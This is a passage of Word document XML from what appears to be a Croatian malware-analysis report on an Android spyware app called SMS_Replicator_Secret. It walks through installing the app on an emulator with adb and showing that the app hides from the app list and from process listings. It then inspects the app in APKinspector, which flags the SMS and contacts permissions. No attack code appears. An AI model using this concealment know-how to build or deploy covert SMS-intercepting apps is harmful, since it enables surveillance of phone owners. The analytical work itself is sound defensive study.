        <w:t>Nakon nekog vremena, trebao bi se učitati simulirani Android OS.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C24408" w:rsidRDefault="00C24408" w:rsidP="00BA144A">
      <w:pPr>
        <w:ind w:firstLine="360"/>
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00C24408" w:rsidRDefault="00B35A13" w:rsidP="00C24408">
      <w:pPr>
        <w:ind w:firstLine="360"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="4692650" cy="7456170"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="16" name="Slika 16" descr="Virtualni ure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rtualni uredaj"/>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2650" cy="7456170"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C204B4" w:rsidRPr="00C204B4" w:rsidRDefault="00D03B55" w:rsidP="00C24408">
      <w:pPr>
        <w:ind w:firstLine="360"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>Slika 4.</w:t>
      </w:r>
      <w:r w:rsidR="00C204B4">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>5. Virtualni uređaj</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C24408" w:rsidRDefault="00C24408" w:rsidP="00BA144A">
      <w:pPr>
        <w:ind w:firstLine="360"/>
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009A7863" w:rsidRDefault="009A7863" w:rsidP="00B13CD3">
      <w:pPr>
        <w:ind w:firstLine="360"/>
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve">Program se instalira preko alata </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>adb</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00B13CD3">
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>tako</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve"> da se uđe u konzolu, dođe do direktorija u kojem je smještena </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>.apk</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve"> datoteka te zatim izda sljedeća naredba:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009A7863" w:rsidRDefault="009A7863" w:rsidP="009A7863">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="center" w:pos="4715"/>
          <w:tab w:val="left" w:pos="6886"/>
        </w:tabs>
        <w:ind w:firstLine="360"/>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:tab/>
        <w:t>adb install &lt;ime_programa&gt;.apk</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009A7863" w:rsidRDefault="009A7863" w:rsidP="009A7863">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="center" w:pos="4715"/>
          <w:tab w:val="left" w:pos="6886"/>
        </w:tabs>
        <w:ind w:firstLine="360"/>
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>, odnosno u ovom slučaju s:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009A7863" w:rsidRDefault="009A7863" w:rsidP="009A7863">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="center" w:pos="4715"/>
          <w:tab w:val="left" w:pos="6886"/>
        </w:tabs>
        <w:ind w:firstLine="360"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>adb install SMS_Replicator_Secret.apk</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C204B4" w:rsidRDefault="00B35A13" w:rsidP="009A7863">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="center" w:pos="4715"/>
          <w:tab w:val="left" w:pos="6886"/>
        </w:tabs>
        <w:ind w:firstLine="360"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5757545" cy="1316355"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="17" name="Slika 17" descr="Primjer instalacija iz kon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mjer instalacija iz konzo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7545" cy="1316355"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C204B4" w:rsidRDefault="00833FF4" w:rsidP="00C204B4">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="center" w:pos="4715"/>
          <w:tab w:val="left" w:pos="6886"/>
        </w:tabs>
        <w:ind w:firstLine="360"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>Slika 4.</w:t>
      </w:r>
      <w:r w:rsidR="00C204B4">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>6. Instalacija programa na Android uređaj</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C204B4" w:rsidRDefault="00C204B4" w:rsidP="009A7863">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="center" w:pos="4715"/>
          <w:tab w:val="left" w:pos="6886"/>
        </w:tabs>
        <w:ind w:firstLine="360"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009A7863" w:rsidRDefault="009A7863" w:rsidP="000C0B6F">
      <w:pPr>
        <w:pStyle w:val="Naslov2"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="73" w:name="_Toc406756508"/>
      <w:bookmarkStart w:id="74" w:name="_Toc406756621"/>
      <w:r>
        <w:t>Analiza programa</w:t>
      </w:r>
      <w:bookmarkEnd w:id="73"/>
      <w:bookmarkEnd w:id="74"/>
    </w:p>
    <w:p w:rsidR="000C0B6F" w:rsidRDefault="000C0B6F" w:rsidP="000C0B6F">
      <w:pPr>
        <w:ind w:firstLine="360"/>
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>Nakon instalacije, na Androidu nema naznake da je program instaliran. Ikone za pristup programu nema, pokrenuti servisi ne prikazuju ništa, a tek se pod instaliranim programima vidi da je program uistinu instaliran.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C204B4" w:rsidRDefault="00B35A13" w:rsidP="00DC509B">
      <w:pPr>
        <w:ind w:firstLine="360"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="2260600" cy="3838575"/>
            <wp:effectExtent l="0" t="0" r="6350" b="9525"/>
            <wp:docPr id="18" name="Slika 18" descr="Programa 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grama nem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0600" cy="3838575"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="2251075" cy="3818255"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="19" name="Slika 19" descr="Nema ni pro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ma ni proces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1075" cy="3818255"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DC509B" w:rsidRPr="00DC509B" w:rsidRDefault="00BF7497" w:rsidP="00DC509B">
      <w:pPr>
        <w:ind w:firstLine="360"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Slika 4.</w:t>
      </w:r>
      <w:r w:rsidR="006205DE">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>7</w:t>
      </w:r>
      <w:r w:rsidR="00DC509B">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>. Nije vidljiv ni pod programima ni pod procesima</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C204B4" w:rsidRDefault="00C204B4" w:rsidP="000C0B6F">
      <w:pPr>
        <w:ind w:firstLine="360"/>
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="000C0B6F" w:rsidRDefault="000C0B6F" w:rsidP="000C0B6F">
      <w:pPr>
        <w:ind w:firstLine="360"/>
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve">Sljedeći korak je izlistavanje svih procesa preko alata </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>adb</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>. To se uradi izdavanje naredaba:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000C0B6F" w:rsidRDefault="000C0B6F" w:rsidP="000C0B6F">
      <w:pPr>
        <w:ind w:firstLine="360"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>adb shell</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000C0B6F" w:rsidRDefault="000C0B6F" w:rsidP="000C0B6F">
      <w:pPr>
        <w:ind w:firstLine="360"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>ps</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C204B4" w:rsidRDefault="00B35A13" w:rsidP="000C0B6F">
      <w:pPr>
        <w:ind w:firstLine="360"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5757545" cy="824230"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="20" name="Slika 20" descr="ADB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B Shel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7545" cy="824230"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C204B4" w:rsidRDefault="00870CFF" w:rsidP="00DC509B">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>Slika 4.8</w:t>
      </w:r>
      <w:r w:rsidR="00DC509B">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="00C204B4">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>Ulazak u shell</w:t>
      </w:r>
      <w:r w:rsidR="00574004">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve"> i naredba ps</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C204B4" w:rsidRDefault="00C204B4" w:rsidP="000C0B6F">
      <w:pPr>
        <w:ind w:firstLine="360"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="000C0B6F" w:rsidRDefault="000C0B6F" w:rsidP="000C0B6F">
      <w:pPr>
        <w:ind w:firstLine="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve">No, niti </w:t>
      </w:r>
      <w:r>
        <w:t>rezultati dobiveni izlistavanjem procesa ne daju naznaku da je program pokrenut.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DC509B" w:rsidRDefault="00B35A13" w:rsidP="000C0B6F">
      <w:pPr>
        <w:ind w:firstLine="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5757545" cy="3747770"/>
            <wp:effectExtent l="0" t="0" r="0" b="5080"/>
            <wp:docPr id="21" name="Slika 21" descr="Proces nije vidljiv ni u ADB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ces nije vidljiv ni u ADB shel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7545" cy="3747770"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DC509B" w:rsidRPr="00DC509B" w:rsidRDefault="009830E4" w:rsidP="00DC509B">
      <w:pPr>
        <w:ind w:firstLine="360"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Slika 4.9</w:t>
      </w:r>
      <w:r w:rsidR="00DC509B">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>. Proces programa nije vidljiv ni alatom adb</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DC509B" w:rsidRDefault="00DC509B" w:rsidP="000C0B6F">
      <w:pPr>
        <w:ind w:firstLine="360"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00DC509B" w:rsidRDefault="000C0B6F" w:rsidP="00DC509B">
      <w:pPr>
        <w:ind w:firstLine="360"/>
      </w:pPr>
      <w:r>
        <w:t>Nastavak analize se uradi</w:t>
      </w:r>
      <w:r w:rsidR="00AE2A14">
        <w:t xml:space="preserve"> tako</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> da se</w:t>
      </w:r>
      <w:r w:rsidR="00DC509B">
        <w:t xml:space="preserve"> otvori APKinspector te u njemu otvori</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>.apk</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DC509B" w:rsidRDefault="00B35A13" w:rsidP="00DC509B">
      <w:pPr>
        <w:ind w:firstLine="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5757545" cy="542925"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="22" name="Slika 22" descr="Otvaranje APKinspec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tvaranje APKinspector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7545" cy="542925"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DC509B" w:rsidRPr="00DC509B" w:rsidRDefault="00EA1DF6" w:rsidP="00DC509B">
      <w:pPr>
        <w:ind w:firstLine="360"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Slika 4.10</w:t>
      </w:r>
      <w:r w:rsidR="00DC509B">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>. Otvaranje programa APKinspector</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DC509B" w:rsidRDefault="00DC509B" w:rsidP="00DC509B">
      <w:pPr>
        <w:ind w:firstLine="360"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="003B3FE8" w:rsidRDefault="003B3FE8" w:rsidP="000C0B6F">
      <w:pPr>
        <w:ind w:firstLine="360"/>
      </w:pPr>
      <w:r>
        <w:t>Nakon učitavanja prikazuje se iskočni prozor koji nas upozorava na osjetljiva dopuštenja koja program traži, a to se vidi i u konzoli s koje se pokrene APKinspector. U ovom slučaju se prikazuju tri osjetljiva dopuštenja, a ona su:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B3FE8" w:rsidRPr="003B3FE8" w:rsidRDefault="003B3FE8" w:rsidP="003B3FE8">
      <w:pPr>
        <w:ind w:firstLine="360"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003B3FE8">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>android.permission.SEND_SMS</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B3FE8" w:rsidRPr="003B3FE8" w:rsidRDefault="003B3FE8" w:rsidP="003B3FE8">
      <w:pPr>
        <w:ind w:firstLine="360"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003B3FE8">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>android.permission.RECEIVE_SMS</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B3FE8" w:rsidRDefault="003B3FE8" w:rsidP="003B3FE8">
      <w:pPr>
        <w:ind w:firstLine="360"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003B3FE8">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>android.permission.READ_CONTACTS</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DC509B" w:rsidRDefault="00B35A13" w:rsidP="003B3FE8">
      <w:pPr>
        <w:ind w:firstLine="360"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="1517015" cy="1195705"/>
            <wp:effectExtent l="0" t="0" r="6985" b="4445"/>
            <wp:docPr id="23" name="Slika 23" descr="Osjetljive dozv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sjetljive dozvo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7015" cy="1195705"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="001730B1" w:rsidRDefault="00262406" w:rsidP="003B3FE8">
      <w:pPr>
        <w:ind w:firstLine="360"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Slika 4.11</w:t>
      </w:r>
      <w:r w:rsidR="001730B1">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="001730B1">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Iskočni prozor koji upozorava </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="001730B1">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>na</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="001730B1">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> osjetljive dozvole</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001730B1" w:rsidRDefault="001730B1" w:rsidP="003B3FE8">
      <w:pPr>
        <w:ind w:firstLine="360"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="001730B1" w:rsidRDefault="00B35A13" w:rsidP="003B3FE8">
      <w:pPr>
        <w:ind w:firstLine="360"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5757545" cy="602615"/>
            <wp:effectExtent l="0" t="0" r="0" b="6985"/>
            <wp:docPr id="24" name="Slika 24" descr="Osjetljive dozvole u konz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sjetljive dozvole u konzol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7545" cy="602615"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="001730B1" w:rsidRDefault="00C43DB3" w:rsidP="003B3FE8">
      <w:pPr>
        <w:ind w:firstLine="360"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Slika 4.12</w:t>
      </w:r>
      <w:r w:rsidR="001730B1">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="001730B1">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Osjetljive dozvole se vide</w:t>
      </w:r>
      <w:r w:rsidR="001730B1">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> se vide i u konzoli</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001730B1" w:rsidRDefault="001730B1" w:rsidP="003B3FE8">
      <w:pPr>
        <w:ind w:firstLine="360"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="001730B1" w:rsidRDefault="00B35A13" w:rsidP="003B3FE8">
      <w:pPr>
        <w:ind w:firstLine="360"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5757545" cy="3627755"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="25" name="Slika 25" descr="Izgled prozora s ucitanom aplikacij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zgled prozora s ucitanom aplikacij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7545" cy="3627755"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="001730B1" w:rsidRPr="001730B1" w:rsidRDefault="00BD5038" w:rsidP="003B3FE8">
      <w:pPr>
        <w:ind w:firstLine="360"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Slika 4.13</w:t>
      </w:r>
      <w:r w:rsidR="001730B1">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>. Izgled prozora s učitanom aplikacijom</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001730B1" w:rsidRPr="001730B1" w:rsidRDefault="001730B1" w:rsidP="003B3FE8">
      <w:pPr>
        <w:ind w:firstLine="360"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
